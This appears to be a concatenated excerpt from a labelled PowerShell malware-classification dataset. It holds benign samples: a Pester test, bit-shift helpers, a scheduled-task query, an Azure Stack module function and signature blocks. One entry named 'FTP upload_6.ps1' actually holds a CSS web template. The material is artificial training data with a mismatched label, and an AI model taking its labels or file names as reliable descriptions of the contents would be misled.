# ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl
# bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsTHVRoYWxlcyBUU1MgRVNO
# OjNCRDQtNEI4MC02OUMzMSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBT
# ZXJ2aWNloIIReDCCBycwggUPoAMCAQICEzMAAAHlj2rA8z20C6MAAQAAAeUwDQYJ
# KoZIhvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x
# EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv
# bjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwHhcNMjMx
# MDEyMTkwNzM1WhcNMjUwMTEwMTkwNzM1WjCB0jELMAkGA1UEBhMCVVMxEzARBgNV
# BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv
# c29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxhbmQgT3Bl
# cmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjozQkQ0LTRC
# ODAtNjlDMzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2VydmljZTCC
# AiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAKl74Drau2O6LLrJO3HyTvO9
# aXai//eNyP5MLWZrmUGNOJMPwMI08V9zBfRPNcucreIYSyJHjkMIUGmuh0rPV5/2
# +UCLGrN1P77n9fq/mdzXMN1FzqaPHdKElKneJQ8R6cP4dru2Gymmt1rrGcNe800C
# cD6d/Ndoommkd196VqOtjZFA1XWu+GsFBeWHiez/PllqcM/eWntkQMs0lK0zmCfH
# +Bu7i1h+FDRR8F7WzUr/7M3jhVdPpAfq2zYCA8ZVLNgEizY+vFmgx+zDuuU/GChD
# K7klDcCw+/gVoEuSOl5clQsydWQjJJX7Z2yV+1KC6G1JVqpP3dpKPAP/4udNqpR5
# HIeb8Ta1JfjRUzSv3qSje5y9RYT/AjWNYQ7gsezuDWM/8cZ11kco1JvUyOQ8x/JD
# kMFqSRwj1v+mc6LKKlj//dWCG/Hw9ppdlWJX6psDesQuQR7FV7eCqV/lfajoLpPN
# x/9zF1dv8yXBdzmWJPeCie2XaQnrAKDqlG3zXux9tNQmz2L96TdxnIO2OGmYxBAA
# ZAWoKbmtYI+Ciz4CYyO0Fm5Z3T40a5d7KJuftF6CToccc/Up/jpFfQitLfjd71cS
# +cLCeoQ+q0n0IALvV+acbENouSOrjv/QtY4FIjHlI5zdJzJnGskVJ5ozhji0YRsc
# v1WwJFAuyyCMQvLdmPddAgMBAAGjggFJMIIBRTAdBgNVHQ4EFgQU3/+fh7tNczEi
# fEXlCQgFOXgMh6owHwYDVR0jBBgwFoAUn6cVXQBeYl2D9OXSZacbUzUZ6XIwXwYD
# VR0fBFgwVjBUoFKgUIZOaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9j
# cmwvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3JsMGwG
# CCsGAQUFBwEBBGAwXjBcBggrBgEFBQcwAoZQaHR0cDovL3d3dy5taWNyb3NvZnQu
# Y29tL3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIw
# MjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIwADAWBgNVHSUBAf8EDDAKBggrBgEFBQcD
# CDAOBgNVHQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQADggIBADP6whOFjD1ad8Gk
# EJ9oLBuvfjndMyGQ9R4HgBKSlPt3pa0XVLcimrJlDnKGgFBiWwI6XOgw82hdolDi
# MDBLLWRMTJHWVeUY1gU4XB8OOIxBc9/Q83zb1c0RWEupgC48I+b+2x2VNgGJUsQI
# yPR2PiXQhT5PyerMgag9OSodQjFwpNdGirna2rpV23EUwFeO5+3oSX4JeCNZvgyU
# OzKpyMvqVaubo+Glf/psfW5tIcMjZVt0elswfq0qJNQgoYipbaTvv7xmixUJGTbi
# xYifTwAivPcKNdeisZmtts7OHbAM795ZvKLSEqXiRUjDYZyeHyAysMEALbIhdXgH
# Eh60KoZyzlBXz3VxEirE7nhucNwM2tViOlwI7EkeU5hudctnXCG55JuMw/wb7c71
# RKimZA/KXlWpmBvkJkB0BZES8OCGDd+zY/T9BnTp8si36Tql84VfpYe9iHmy7Pqq
# xqMF2Cn4q2a0mEMnpBruDGE/gR9c8SVJ2ntkARy5SfluuJ/MB61yRvT1mUx3lypp
# O22ePjBjnwoEvVxbDjT1jhdMNdevOuDeJGzRLK9HNmTDC+TdZQlj+VMgIm8ZeEIR
# NF0oaviF+QZcUZLWzWbYq6yDok8EZKFiRR5otBoGLvaYFpxBZUE8mnLKuDlYobjr
# xh7lnwrxV/fMy0F9fSo2JxFmtLgtMIIHcTCCBVmgAwIBAgITMwAAABXF52ueAptJ
# mQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgT
# Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m
# dCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNh
# dGUgQXV0aG9yaXR5IDIwMTAwHhcNMjEwOTMwMTgyMjI1WhcNMzAwOTMwMTgzMjI1
# WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH
# UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD
# Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCCAiIwDQYJKoZIhvcNAQEB
# BQADggIPADCCAgoCggIBAOThpkzntHIhC3miy9ckeb0O1YLT/e6cBwfSqWxOdcjK
# NVf2AX9sSuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZnhUYjDLWNE893MsAQGOhg
# fWpSg0S3po5GawcU88V29YZQ3MFEyHFcUTE3oAo4bo3t1w/YJlN8OWECesSq/XJp
# rx2rrPY2vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxqD89d9P6OU8/W7IVWTe/d
# vI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0hyTD4MmPfrVUj9z6BVWYbWg7mka9
# 7aSueik3rMvrg0XnRm7KMtXAhjBcTyziYrLNueKNiOSWrAFKu75xqRdbZ2De+JKR
# Hh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXftnIv231fgLrbqn427DZM9itu
# qBJR6L8FA6PRc6ZNN3SUHDSCD/AQ8rdHGO2n6Jl8P0zbr17C89XYcz1DTsEzOUyO
# ArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYctenIPDC+hIK12NvDMk2ZItb
# oKaDIV1fMHSRlJTYuVD5C4lh8zYGNRiER9vcG9H9stQcxWv2XFJRXRLbJbqvUAV6
# bMURHXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17aj54WcmnGrnu3tz5q4i6t
# AgMBAAGjggHdMIIB2TASBgkrBgEEAYI3FQEEBQIDAQABMCMGCSsGAQQBgjcVAgQW
# BBQqp1L+ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQUn6cVXQBeYl2D9OXSZacb
# UzUZ6XIwXAYDVR0gBFUwUzBRBgwrBgEEAYI3TIN9AQEwQTA/BggrBgEFBQcCARYz
# aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9Eb2NzL1JlcG9zaXRvcnku
# aHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkGCSsGAQQBgjcUAgQMHgoAUwB1AGIA
# QwBBMAsGA1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFNX2
# VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0wS6BJoEeGRWh0dHA6Ly9jcmwu
# bWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01pY1Jvb0NlckF1dF8yMDEw
# LTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYBBQUHMAKGPmh0dHA6Ly93
# d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYt
# MjMuY3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3hLB9nATEkW+Geckv8qW/q
# XBS2Pk5HZHixBpOXPTEztTnXwnE2P9pkbHzQdTltuw8x5MKP+2zRoZQYIu7pZmc6
# U03dmLq2HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74py27YP0h1AdkY3m2CDPVt
# I1TkeFN1JFe53Z/zjj3G82jfZfakVqr3lbYoVSfQJL1AoL8ZthISEV09J+BAljis
# 9/kpicO8F7BUhUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbCHcNhcy4sa3tuPywJeBTp
# kbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZlvSP9pEB9s7GdP32THJvEKt1MMU0
# sHrYUP4KWN1APMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNtyo4JvbMBV0lUZNlz138e
# W0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFHqfG3rsjoiV5PndLQTHa1V1QJ
# sWkBRH58oWFsc/4Ku+xBZj1p/cvBQUl+fpO+y/g75LcVv7TOPqUxUYS8vwLBgqJ7
# Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A245oyZ1uEi6vAnQj0llOZ0
# dFtq0Z4+7X6gMTN9vMvpe784cETRkPHIqzqKOghif9lwY1NNje6CbaUFEMFxBmoQ
# tB1VM1izoXBm8qGCAtQwggI9AgEBMIIBAKGB2KSB1TCB0jELMAkGA1UEBhMCVVMx
# EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT
# FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxh
# bmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjoz
# QkQ0LTRCODAtNjlDMzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2Vy
# dmljZaIjCgEBMAcGBSsOAwIaAxUA942iGuYFrsE4wzWDd85EpM6RiwqggYMwgYCk
# fjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH
# UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD
# Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQUFAAIF
# AOnv800wIhgPMjAyNDA1MTYxMDUxNTdaGA8yMDI0MDUxNzEwNTE1N1owdDA6Bgor
# BgEEAYRZCgQBMSwwKjAKAgUA6e/zTQIBADAHAgEAAgIG2zAHAgEAAgIUMDAKAgUA
# 6fFEzQIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAowCAIBAAID
# B6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBBQUAA4GBAE/ZvDwugy6NnYyIDV7u
# OSLWi/ufyQ+0+8oP/z2EFLWVt1PPV9ckDwOXfMyZUrmeW13sfHNC/IxUxFOo4o6f
# zlnV7jGD2rKF1A4HHzrz25qNAoYIhSmyXWxlEnQSsjafsbqZ4nebWLCpisf9Xvpk
# FD9uxVS2ajQVLxRI4TtSt9PjMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMCVVMx
# EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT
# FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUt
# U3RhbXAgUENBIDIwMTACEzMAAAHlj2rA8z20C6MAAQAAAeUwDQYJYIZIAWUDBAIB
# BQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0BCQQx
# IgQgh0tTY2Js2asft3yl5XpvpKwN9znkDTlkrSYzPt+/lCUwgfoGCyqGSIb3DQEJ
# EAIvMYHqMIHnMIHkMIG9BCAVqdP//qjxGFhe2YboEXeb8I/pAof01CwhbxUH9U69
# 7TCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw
# DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x
# JjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB5Y9q
# wPM9tAujAAEAAAHlMCIEIAbnS84eHhUBUYVK4RZHP3oaXBAIVzGN5U0dVtVYzunV
# MA0GCSqGSIb3DQEBCwUABIICAJdhDXj1ftOKV1XndtKxWAkmWyJ30LkP/NxWwZdQ
# GvSSXov01pRRMgxmSTS8kscUJz+1kXRqzbCFUW0/f7fN4Cw4SlxQeHpwfraTJBVJ
# LSkjCzE3aziv879n+TnVAEbEEjSC3oFHjnz2/SVKiesE4OLFvrK80X9MY06bFLby
# NbMGyen8PkBFwydnKgonGdPuhM9tRC3/igcg/XBGynG3axjXwk3qeWUR5ZnV5X8x
# 88yVPvgNUzWj9Lyrjxx6qz9q3KPH1lfj5SAo/smZqPWVNI2fagHkVVf/FBWNFX5X
# zFmgHj5T8UL1Tu9Qqz76qe7WIa8VTbNonIn1J2BWyRP6ak1/mBmLIpgWvVWeqIeG
# wBoN8u0o7b3UQpKdCpGGDSFETcJLUsxn2DJBQ2+mijFPn4QUbaXlr01k81xV7LAi
# 3lNuZ/wWUTixGu7Z7mVHPuRk8e3NJ3GT96byjxwtOh5hsbCiQRzz3bF1O10DtYU0
# wQ2/8m9RgS7EX3I7fUqWvE1O40b4fH6eCbZw2AXtaDrWMmL2b8xhS4iOV9VY/1WJ
# 3YKXaNYixui0pe540G9Ew+drkyYdN4uZTzIWUWIqW6wJPrO+swstH3m4oM0Y39AL
# btulPPYyiRt7WzQEKI65S1C4xfBgzQcJbldnQsy5NKp+wf7qE1SuLn126CFv64ls
# DJo8
# SIG # End signature block
|
combined_dataset/train/non-malicious/2038.ps1
|
2038.ps1
|
Describe "Assembly::LoadWithPartialName Validation Test" -Tags "CI" {
$defaultErrorId = 'FileLoadException'
$testcases = @(
@{
Name = 'system.windows.forms'
ErrorId = $defaultErrorId
}
@{
Name = 'System.Windows.Forms'
ErrorId = $defaultErrorId
}
)
It "Assembly::LoadWithPartialName should fail to load blacklisted assembly: <Name>" -Pending -TestCases $testcases {
param(
[Parameter(Mandatory)]
[string]
$Name,
[Parameter(Mandatory)]
[string]
$ErrorId
)
{[System.Reflection.Assembly]::LoadWithPartialName($Name)} | Should -Throw -ErrorId $ErrorId
}
}
|
combined_dataset/train/non-malicious/FTP upload_6.ps1
|
FTP upload_6.ps1
|
@charset "utf-8";
/*
Credit:http://www.templatemo.com
*/
body {
margin: 0px;
padding: 0px;
color: #c2bead;
font-family: Tahoma, Geneva, sans-serif;
font-size: 12px;
line-height: 1.5em;
background-color: #2f2e28;
background-image: url(images/templatemo_body.jpg);
background-repeat: repeat-y;
background-position: left;
}
a, a:link, a:visited { color: #34baf9; text-decoration: none; }
a:hover { color: #CCFF00; text-decoration: underline; }
p { margin: 0 0 10px 0; padding: 0; }
img { border: none; }
h1, h2, h3, h4, h5, h6 { color: #e2c934; }
h1 { font-size: 24px; font-weight: normal; margin: 0 0 30px 0; padding: 5px 0; }
h2 { font-size: 20px; font-weight: normal; margin: 0 0 30px 0; font-weight: normal; }
h3 { font-size: 16px; margin: 0 0 15px 0; padding: 0; padding: 0; font-weight: normal; }
h4 { font-size: 14px; margin: 0 0 15px 0; padding: 0; }
.cleaner { clear: both; width: 100%; height: 0px; font-size: 0px; }
.cleaner_h10 { clear: both; width:100%; height: 10px; }
.cleaner_h20 { clear: both; width:100%; height: 20px; }
.cleaner_h30 { clear: both; width:100%; height: 30px; }
.cleaner_h40 { clear: both; width:100%; height: 40px; }
.cleaner_h50 { clear: both; width:100%; height: 50px; }
.cleaner_h60 { clear: both; width:100%; height: 60px; }
.float_l { float: left; }
.float_r { float: right; }
.image_wrapper { display: inline-block; border: 1px solid #000; background: #333; padding: 4px; margin-bottom: 10px; }
.image_fl { float: left; margin: 3px 15px 0 0; }
.image_fr { float: right; margin: 3px 0 0 15px; }
blockquote { font-style: italic; margin: 0 0 0 10px;}
cite { font-weight: bold; color:#333; }
cite span { color: #666; }
em { color: #f9a834; }
.tmo_list { margin: 20px 0 20px 20px; padding: 0; list-style: none; }
.tmo_list li { background: transparent url(images/templatemo_list.png) no-repeat; margin:0 0 20px; padding: 0 0 0 20px; line-height: 1em; }
.tmo_list li a { color: #fff; }
.tmo_list li a:hover { color: #ff4301; }
.btn_more a {
display: inline-block;
font-weight: bold;
color: #dcd9cb;
}
.btn_more a span {
font-size: 16px;
}
.btn_more a:hover {
color: #CCFF00;
text-decoration: none;
}
.service_list { margin: 40px 0 0 30px; padding: 0; list-style: none; }
.service_list li { margin: 0; padding: 0; }
.service_list li a { display: block; height: 25px; margin-bottom: 20px; padding-left: 35px; }
.service_list li .service_one { background: url(images/onebit_08.png) center left no-repeat; }
.service_list li .service_two { background: url(images/onebit_11.png) center left no-repeat; }
.service_list li .service_three { background: url(images/onebit_17.png) center left no-repeat; }
.service_list li .service_four { background: url(images/onebit_21.png) center left no-repeat; }
.service_list li .service_five { background: url(images/onebit_12.png) center left no-repeat; }
#contact_form { padding: 0; }
#contact_form form { margin: 0px; padding: 0px; }
#contact_form form .input_field { width: 440px; padding: 8px; background: #333028; border: 1px solid #886; color: #FFF; }
#contact_form form label { display: block; width: 100px; margin-right: 10px; font-size: 14px; margin-bottom: 3px; }
#contact_form form textarea {
width: 440px;
height: 120px;
padding: 8px;
background: #333028;
font-family: Arial, Helvetica, sans-serif;
border: 1px solid #886;
color: #FFF;
}
#contact_form form .submit_btn {
color: #886;
background: #333028;
border: 1px solid #886;
padding: 10px 20px;
margin-right: 140px;
font-size: 15px;
}
#gallery_container {
clear: both;
margin-top: 30px;
padding-right: 40px;
width: 480px;
height: 320px;
overflow: auto;
}
#gallery_container .gallery_box {
clear: both;
display: block;
padding: 0;
margin: 0 0 40px 0;
}
.gallery_box img {
float: left;
width: 120px;
height: 100px;
padding: 4px;
background: #fff;
border: 1px solid #ccc;
margin: 3px 30px 0 0;
}
#templatemo_footer {
clear: both;
width: 600px;
padding: 20px 0;
text-align: center;
}/* CSS Document */
|
combined_dataset/train/non-malicious/Shift Operators(Correct)_1.ps1
|
Shift Operators(Correct)_1.ps1
|
#requires -version 2.0
Add-Type @"
public class Shift {
public static int Right(int x, int count) { return x >> count; }
public static uint Right(uint x, int count) { return x >> count; }
public static long Right(long x, int count) { return x >> count; }
public static ulong Right(ulong x, int count) { return x >> count; }
public static int Left(int x, int count) { return x << count; }
public static uint Left(uint x, int count) { return x << count; }
public static long Left(long x, int count) { return x << count; }
public static ulong Left(ulong x, int count) { return x << count; }
}
"@
#.Example
# Shift-Left 16 1 ## returns 32
#.Example
# 8,16 |Shift-Left ## returns 16,32
function Shift-Left {
PARAM( $x=1, $y )
BEGIN {
if($y) {
[Shift]::Left( $x, $y )
}
}
PROCESS {
if($_){
[Shift]::Left($_, $x)
}
}
}
#.Example
# Shift-Right 8 1 ## returns 4
#.Example
# 2,4,8 |Shift-Right 2 ## returns 0,1,2
function Shift-Right {
PARAM( $x=1, $y )
BEGIN {
if($y) {
[Shift]::Right( $x, $y )
}
}
PROCESS {
if($_){
[Shift]::Right($_, $x)
}
}
}
|
combined_dataset/train/non-malicious/2764.ps1
|
2764.ps1
|
schtasks /query /FO CSV /v | ConvertFrom-Csv
|
combined_dataset/train/non-malicious/sample_45_5.ps1
|
sample_45_5.ps1
|
<###################################################
# #
# Copyright (c) Microsoft. All rights reserved. #
# #
##################################################>
function Get-StampConfigurationFolder([CloudEngine.Configurations.EceInterfaceParameters] $Parameters, [bool]$Create = $true)
{
<#
.SYNOPSIS
Gets the folder to store stamp configuration files to.
.EXAMPLE
[FabricRingServces]::Get-StampConfigurationFolder($Parameters)
.PARAMETER Parameters
The ECE role parameters for this interface.
.PARAMETER Create
True to create the folder if it does not exist.
#>
$shareClusterName = Get-ManagementClusterName $Parameters
$share = Get-ClusterShare -Parameters $Parameters -ClusterName $shareClusterName -ShareType "Infrastructure_2"
$diagnosticsShare = "$share\Diagnostics"
$folder = "$diagnosticsShare\StampConfiguration"
Trace-Execution "Stamp Configuration Folder is: $folder"
if ($Create -and (-not (Test-Path $folder)))
{
Trace-Execution "Stamp Configuration Folder does not exist, creating..."
mkdir $folder | Out-Null
}
return $folder
}
Export-ModuleMember -Function Get-StampConfigurationFolder
# SIG # Begin signature block
# MIInvwYJKoZIhvcNAQcCoIInsDCCJ6wCAQExDzANBglghkgBZQMEAgEFADB5Bgor
# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG
# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCBmplxaupHWRX4z
# Fmoa/2hgEvE/dcvriUn4aa2rnpA8gqCCDXYwggX0MIID3KADAgECAhMzAAADrzBA
# DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p
# bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
# AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA
# hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG
# 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN
# xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL
# go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB
# tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE
# AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw
# RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW
# MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci
# tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG
# CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu
# Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0
# MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd
# mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ
# 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY
# 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp
# XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn
# TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT
# e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG
# OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O
# PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk
# ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx
# HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt
# CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq
# hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x
# EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv
# bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5
# IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG
# EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG
# A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg
# Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC
# CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03
# a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr
# rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg
# OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy
# 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9
# sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh
# dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k
# A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB
# w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn
# Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90
# lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w
# ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o
# ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD
# VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa
# BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny
# bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG
# AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t
# L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV
# HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3
# dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG
# AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl
# AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb
